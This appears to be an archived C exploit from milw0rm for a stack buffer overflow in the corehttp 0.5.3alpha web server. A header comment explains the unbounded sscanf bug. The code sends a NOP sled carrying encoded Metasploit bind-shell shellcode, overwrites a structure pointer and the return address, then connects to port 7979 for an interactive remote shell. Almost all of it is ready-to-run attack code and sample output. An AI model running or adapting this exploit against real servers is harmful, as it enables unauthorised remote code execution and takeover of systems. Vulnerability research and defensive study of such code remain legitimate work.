332 lines
No EOL
14 KiB
C
332 lines
No EOL
14 KiB
C
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
|
|
* *
|
|
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
|
|
* *
|
|
* compile: *
|
|
* gcc xcorehttp.c -o xcorehttp *
|
|
* *
|
|
* syntax: *
|
|
* ./xcorehttp [-r] -h host -p port *
|
|
* *
|
|
* corehttp homepage/url: *
|
|
* http://corehttp.sourceforge.net/ *
|
|
* *
|
|
* bug(http.c): *
|
|
* ----------------------------------------------------------------------- *
|
|
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
|
|
* struct sprock_t *sprocket; *
|
|
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
|
|
* ... *
|
|
* if ((sprocket = (struct sprock_t *) *
|
|
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
|
|
* ... *
|
|
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
|
|
* !(the bug/overwrite) --------------------------------------^----^ *
|
|
* strncpy(sprocket->parent->url, url, PATHSIZE); *
|
|
* !(the problem) -^ *
|
|
* ... *
|
|
* for (i = 0; req[i] != '\0'; i++) *
|
|
* req[i] = toupper(req[i]); *
|
|
* !(another problem) -^ *
|
|
* ... *
|
|
* } *
|
|
* ----------------------------------------------------------------------- *
|
|
* *
|
|
* explaination: *
|
|
* the sscanf() call in the above code contains no bounds checks for *
|
|
* writing to either req[] or url[] (i chose url[] as it gave more room *
|
|
* to work with, by overwriting into req[], and isnt limited to *
|
|
* alphabetical characters only) *
|
|
* *
|
|
* the first problem is that this overflows into the *sprocket structure *
|
|
* pointer, which is used immediately after the overflow. this is *
|
|
* automatically calculated in this exploit, using the same location in *
|
|
* memory with an offset. (+512 to ret address, which points to the nops) *
|
|
* *
|
|
* the second problem is all lowercase characters get uppercased, this *
|
|
* will happen weither or not you overwrite via req[] or url[]. if the *
|
|
* return address contains a lowercase character it will uppercase it. *
|
|
* *
|
|
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
|
|
* characters should be doable. *
|
|
* *
|
|
* note: *
|
|
* there are two areas in the stack this will appear, the one closer *
|
|
* to the top of the stack should be used. *
|
|
* *
|
|
* example usage: *
|
|
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
|
|
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
|
|
* [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
|
|
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
|
|
* *
|
|
* [*] target : dual.fakehalo.lan:5555 *
|
|
* [*] return address : 0xbfffea60 *
|
|
* [*] *sprocket replacement : 0xbfffec60 *
|
|
* *
|
|
* [*] attempting to connect: dual.fakehalo.lan:5555. *
|
|
* [*] successfully connected: dual.fakehalo.lan:5555. *
|
|
* [*] sending string: *
|
|
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
|
|
* [*] closing connection. *
|
|
* *
|
|
* [*] attempting to connect: dual.fakehalo.lan:7979. *
|
|
* [*] successfully connected: dual.fakehalo.lan:7979. *
|
|
* *
|
|
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
|
|
* uid=501(v9) gid=501(v9) groups=501(v9) *
|
|
* *
|
|
* (...nothing like a overly complex exploit to quench my brain thirst. *
|
|
* although, i didn't do any support for randomized memory addresses, oh *
|
|
* well) *
|
|
***************************************************************************/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#ifndef __USE_BSD
|
|
#define __USE_BSD
|
|
#endif
|
|
#include <string.h>
|
|
#include <strings.h>
|
|
#include <signal.h>
|
|
#include <unistd.h>
|
|
#include <netdb.h>
|
|
#include <getopt.h>
|
|
#include <ctype.h>
|
|
#include <sys/socket.h>
|
|
#include <sys/types.h>
|
|
#include <sys/time.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
|
|
#define BUFSIZE (2+512+16+256+4)
|
|
#define TIMEOUT 10
|
|
#define SPORT 7979
|
|
|
|
#define DFL_RETADDR 0xbfffea60
|
|
|
|
/* globals. */
|
|
|
|
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
|
|
/* http://metasploit.com */
|
|
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
|
|
static char x86_bind[]=
|
|
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
|
|
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
|
|
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
|
|
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
|
|
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
|
|
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
|
|
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
|
|
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
|
|
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
|
|
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
|
|
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
|
|
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
|
|
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
|
|
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
|
|
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
|
|
"\x42\x58\x5a";
|
|
|
|
struct{
|
|
unsigned int addr;
|
|
char *host;
|
|
unsigned short port;
|
|
}tbl;
|
|
|
|
/* lonely extern. */
|
|
extern char *optarg;
|
|
|
|
/* functions. */
|
|
char *getbuf(unsigned int);
|
|
unsigned short corehttp_connect(char *,unsigned short);
|
|
signed int getshell_conn(char *,unsigned short);
|
|
void proc_shell(signed int);
|
|
void printe(char *,short);
|
|
void usage(char *);
|
|
void sig_alarm(){printe("alarm/timeout hit.",1);}
|
|
|
|
/* start. */
|
|
int main(int argc,char **argv){
|
|
signed int chr=0,rsock=0;
|
|
|
|
printf("[*] corehttp[v0.5.3alpha]: httpd remote buffer overflo"
|
|
"w exploit.\n[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)"
|
|
"\n\n");
|
|
|
|
tbl.addr=DFL_RETADDR;
|
|
|
|
while((chr=getopt(argc,argv,"h:p:r:"))!=EOF){
|
|
switch(chr){
|
|
case 'h':
|
|
if(!tbl.host&&!(tbl.host=(char *)strdup(optarg)))
|
|
printe("main(): allocating memory failed",1);
|
|
break;
|
|
case 'p':
|
|
tbl.port=atoi(optarg);
|
|
break;
|
|
case 'r':
|
|
sscanf(optarg,"%x",&tbl.addr);
|
|
break;
|
|
default:
|
|
usage(argv[0]);
|
|
break;
|
|
}
|
|
}
|
|
if(!tbl.host||!tbl.port)usage(argv[0]);
|
|
if(tbl.addr%4)printe("return address must be a multiple of 4.",1);
|
|
if((tbl.addr&0x000000ff)!=toupper((tbl.addr&0x000000ff)) ||
|
|
((tbl.addr&0x0000ff00)>>8)!=toupper(((tbl.addr&0x0000ff00)>>8)) ||
|
|
((tbl.addr&0x00ff0000)>>16)!=toupper(((tbl.addr&0x00ff0000)>>16)) ||
|
|
((tbl.addr&0xff000000)>>24)!=toupper(((tbl.addr&0xff000000)>>24)))
|
|
printe("return address contains a lowercase character.",1);
|
|
|
|
printf("[*] target\t\t\t: %s:%d\n",tbl.host,tbl.port);
|
|
printf("[*] return address\t\t: 0x%.8x\n",tbl.addr);
|
|
printf("[*] *sprocket replacement\t: 0x%.8x\n\n",(tbl.addr+512));
|
|
|
|
corehttp_connect(tbl.host,tbl.port);
|
|
rsock=getshell_conn(tbl.host,SPORT);
|
|
if(rsock>0)proc_shell(rsock);
|
|
exit(0);
|
|
}
|
|
|
|
/* make buf: */
|
|
/* "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" */
|
|
char *getbuf(unsigned int addr){
|
|
unsigned int i=0;
|
|
char *buf;
|
|
if(!(buf=(char *)malloc(BUFSIZE+1)))
|
|
printe("getbuf(): allocating memory failed.",1);
|
|
memset(buf,0,BUFSIZE);
|
|
|
|
/* needed to match the sscanf(); */
|
|
memcpy(buf,"X ",2);
|
|
|
|
/* make [NOPS+SHELLCODE], 512 bytes, overwrites url[256] AND req[256], */
|
|
/* right up until the 'struct sprock_t *sprocket' pointer */
|
|
memset(buf+2,'\x90',(513-sizeof(x86_bind)));
|
|
memcpy(buf+2+(513-sizeof(x86_bind)),x86_bind,strlen(x86_bind));
|
|
|
|
/* replaces the *sprocket pointer, really only needed at 524[4], the */
|
|
/* first ones are fillers. */
|
|
for(i=0;i<16;i+=4){
|
|
*(long *)&buf[2+512+i]=(addr+512);
|
|
}
|
|
|
|
/* the *sprocket pointer will now point to this, which goes to the */
|
|
/* shellcode. */
|
|
for(i=0;i<256;i+=4){
|
|
*(long *)&buf[2+512+16+i]=addr;
|
|
}
|
|
|
|
/* needed to be interpreted by corehttp. */
|
|
memcpy(buf+2+512+16+256,"\r\n\r\n",4);
|
|
|
|
/* send it on its way. */
|
|
return(buf);
|
|
}
|
|
|
|
/* connects to the vulnerable corehttp server. */
|
|
unsigned short corehttp_connect(char *hostname,unsigned short port){
|
|
signed int sock;
|
|
struct hostent *t;
|
|
struct sockaddr_in s;
|
|
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
|
|
s.sin_family=AF_INET;
|
|
s.sin_port=htons(port);
|
|
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
|
|
if((s.sin_addr.s_addr=inet_addr(hostname))){
|
|
if(!(t=gethostbyname(hostname)))
|
|
printe("couldn't resolve hostname.",1);
|
|
memcpy((char *)&s.sin_addr,(char *)t->h_addr,sizeof(s.sin_addr));
|
|
}
|
|
signal(SIGALRM,sig_alarm);
|
|
alarm(TIMEOUT);
|
|
if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
|
|
printe("corehttp/httpd connection failed.",1);
|
|
alarm(0);
|
|
printf("[*] successfully connected: %s:%d.\n",hostname,port);
|
|
sleep(1);
|
|
printf("[*] sending string:\n");
|
|
printf("[+] \"X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\\r\\n"
|
|
"\\r\\n\"\n");
|
|
write(sock,getbuf(tbl.addr),BUFSIZE);
|
|
sleep(1);
|
|
printf("[*] closing connection.\n\n");
|
|
close(sock);
|
|
return(0);
|
|
}
|
|
|
|
/* connects to bindshell. */
|
|
signed int getshell_conn(char *hostname,unsigned short port){
|
|
signed int sock=0;
|
|
struct hostent *he;
|
|
struct sockaddr_in sa;
|
|
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
|
|
printe("getshell_conn(): socket() failed.",1);
|
|
sa.sin_family=AF_INET;
|
|
if((sa.sin_addr.s_addr=inet_addr(hostname))){
|
|
if(!(he=gethostbyname(hostname)))
|
|
printe("getshell_conn(): couldn't resolve.",1);
|
|
memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
|
|
sizeof(sa.sin_addr));
|
|
}
|
|
sa.sin_port=htons(port);
|
|
signal(SIGALRM,sig_alarm);
|
|
printf("[*] attempting to connect: %s:%d.\n",hostname,port);
|
|
alarm(TIMEOUT);
|
|
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
|
|
printf("[!] connection failed: %s:%d.\n",hostname,port);
|
|
exit(1);
|
|
}
|
|
alarm(0);
|
|
printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
|
|
return(sock);
|
|
}
|
|
|
|
/* process the bindshell. */
|
|
void proc_shell(signed int sock){
|
|
signed int r=0;
|
|
char buf[4096+1];
|
|
fd_set fds;
|
|
signal(SIGINT,SIG_IGN);
|
|
write(sock,"uname -a;id\n",13);
|
|
while(1){
|
|
FD_ZERO(&fds);
|
|
FD_SET(0,&fds);
|
|
FD_SET(sock,&fds);
|
|
if(select(sock+1,&fds,0,0,0)<1)
|
|
printe("getshell(): select() failed.",1);
|
|
if(FD_ISSET(0,&fds)){
|
|
if((r=read(0,buf,4096))<1)
|
|
printe("getshell(): read() failed.",1);
|
|
if(write(sock,buf,r)!=r)
|
|
printe("getshell(): write() failed.",1);
|
|
}
|
|
if(FD_ISSET(sock,&fds)){
|
|
if((r=read(sock,buf,4096))<1)exit(0);
|
|
write(1,buf,r);
|
|
}
|
|
}
|
|
close(sock);
|
|
return;
|
|
}
|
|
|
|
/* error! */
|
|
void printe(char *err,short e){
|
|
printf("[!] %s\n",err);
|
|
if(e)exit(1);
|
|
return;
|
|
}
|
|
|
|
/* usage. */
|
|
void usage(char *progname){
|
|
printf("syntax: %s [-r] -h host -p port\n\n",progname);
|
|
printf(" -h <host/ip>\ttarget hostname/ip.\n");
|
|
printf(" -p <port>\ttarget port.\n");
|
|
printf(" -r <addr>\tdefine return address. (0x%.8x)\n\n",tbl.addr);
|
|
exit(0);
|
|
}
|
|
|
|
// milw0rm.com [2007-07-29]
|